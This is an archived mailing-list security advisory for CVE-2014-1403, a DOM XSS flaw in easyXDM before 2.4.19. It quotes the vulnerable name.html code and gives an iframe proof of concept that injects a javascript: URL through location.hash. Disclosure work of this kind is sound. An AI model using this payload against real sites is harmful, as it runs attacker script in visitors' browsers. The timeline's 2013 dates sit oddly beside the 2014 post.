lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 31 Jan 2014 22:24:10 +0100
From: Krzysztof Kotowicz <kkotowicz+fd@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: [CVE-2014-1403] DOM XSS in EasyXDM 2.4.18

Affected products
=================
easyXDM library < 2.4.19 - http://easyxdm.net/wp/

easyXDM is a Javascript library that enables you as a developer to easily
work around the limitation set in place by the Same Origin Policy, in turn
making it easy to communicate and expose javascript API's across domain
boundaries.

Vulnerabilities are fixed in version 2.4.19. All users are advised to
upgrade.

CVE
===
CVE-2014-1403

DOM XSS in name.html location.hash value
========================================

Description
-----------
EasyXDM uses name.html file to bootstrap cross origin communication
between documents. It accepts various parameters in location.hash value,
one of which is the URL of the document to load. Value of this parameter
is not filtered, allowing to pass javascript: URL that may execute
arbitrary Javascript code in context of the domain hosting EasyXDM
installation.

This vulnerability is described in greater details in [1]

Analysis
--------
The root cause of the vulnerability is the following code in name.html
file:

    if (location.hash) { // DOM XSS source
      if (location.hash.substring(1, 2) === "_") {
        var channel, url,
          hash = location.href.substring(location.href.indexOf("#") + 3),
        indexOf = hash.indexOf(",");
        if (indexOf == -1) {
          channel = hash;
        }
        else {
          channel = hash.substring(0, indexOf);
          url = decodeURIComponent(hash.substring(indexOf + 1));
        }
        switch (location.hash.substring(2, 3)) {
          /...
          case "3":
            // NameTransport remote
            var guest = window.parent.frames[
              "easyXDM_" + channel + "_provider"
              ];
            if (!guest) {
              throw new Error("unable to reference window");
            }
            guest.easyXDM.Fn.get(channel)(window.name);
            location.href = url + "#_4" + channel + ","; // DOM XSS sink
            break;

Part of location hash, under certain conditions, ends up in location.href
assignment, triggering JS execution.

Proof of Concept
----------------

<iframe id=f></iframe>   <iframe name="easyXDM_constructor_provider"
src="http://domain/example/bridge.html" onload="document.getElementById('f'
).src=
'http://domain/name.html#_3constructor,javascript:alert(document.domain)//'
;"> </iframe>

Credits
=======
Vulnerability found by Krzysztof Kotowicz <kkotowicz at cure53.de>
http://blog.kotowicz.net

Timeline
========
  - 2013-01-xx - Discovery
  - 2013-01-10 - Notified project maintainer
  - 2013-01-19 - Fixed version release
  - 2013-01-31 - Public disclosure

Related links
=============
[1]
http://blog.kotowicz.net/2014/01/xssing-with-shakespeare-name-calling.html

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ